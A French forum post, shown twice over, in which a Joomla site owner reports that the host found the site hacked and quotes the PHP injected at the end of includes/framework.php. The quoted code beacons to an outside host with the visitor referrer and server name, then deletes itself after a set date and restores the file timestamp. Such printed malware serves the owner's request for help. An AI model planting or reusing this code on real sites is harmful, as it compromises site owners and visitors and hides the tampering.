Bonjour
je suis sur l'hébergeur celeonet qui vient de me dire que mon site et d'autres ont été piratés suite à une faille joomla dans le fichier /includes/framework.php
je cite:
Le fichier /ap1510/includes/framework.php inclut, dans une fonction rajoutée à la fin du fichier, un appel vers une URL qui ne répond pas, et l'erreur de timeout est donc causée par cela.
C'est un piratage que nous avons constaté plusieurs fois cette semaine, exploitant une faille de Joomla.
effectivement voici les lignes ajoutées en fin de fichier
check_meta();
function check_meta(){
$jp = __FILE__;
$jptime = filemtime($jp);
if(time() >= 1456727708){
$jp_c = file_get_contents($jp);
if($t = @strpos($jp_c,"check_meta();")) {
$contentp = substr($jp_c,0,$t);
if(@file_put_contents($jp, $contentp)){
@touch($jp,$jptime);
}
}
}
@file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php");
}
Bien sur on peut retirer les lignes mais rien n’empêchent les c....... qui n'ont rien d'autres à f...... de les remettre.
y a t'il une version prévue prochainement pour corriger cette faille ou au moins un fichier pour palier le pb
merci
je suis sur l'hébergeur celeonet qui vient de me dire que mon site et d'autres ont été piratés suite à une faille joomla dans le fichier /includes/framework.php
je cite:
Le fichier /ap1510/includes/framework.php inclut, dans une fonction rajoutée à la fin du fichier, un appel vers une URL qui ne répond pas, et l'erreur de timeout est donc causée par cela.
C'est un piratage que nous avons constaté plusieurs fois cette semaine, exploitant une faille de Joomla.
effectivement voici les lignes ajoutées en fin de fichier
check_meta();
function check_meta(){
$jp = __FILE__;
$jptime = filemtime($jp);
if(time() >= 1456727708){
$jp_c = file_get_contents($jp);
if($t = @strpos($jp_c,"check_meta();")) {
$contentp = substr($jp_c,0,$t);
if(@file_put_contents($jp, $contentp)){
@touch($jp,$jptime);
}
}
}
@file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php");
}
Bien sur on peut retirer les lignes mais rien n’empêchent les c....... qui n'ont rien d'autres à f...... de les remettre.
y a t'il une version prévue prochainement pour corriger cette faille ou au moins un fichier pour palier le pb
merci
Commentaire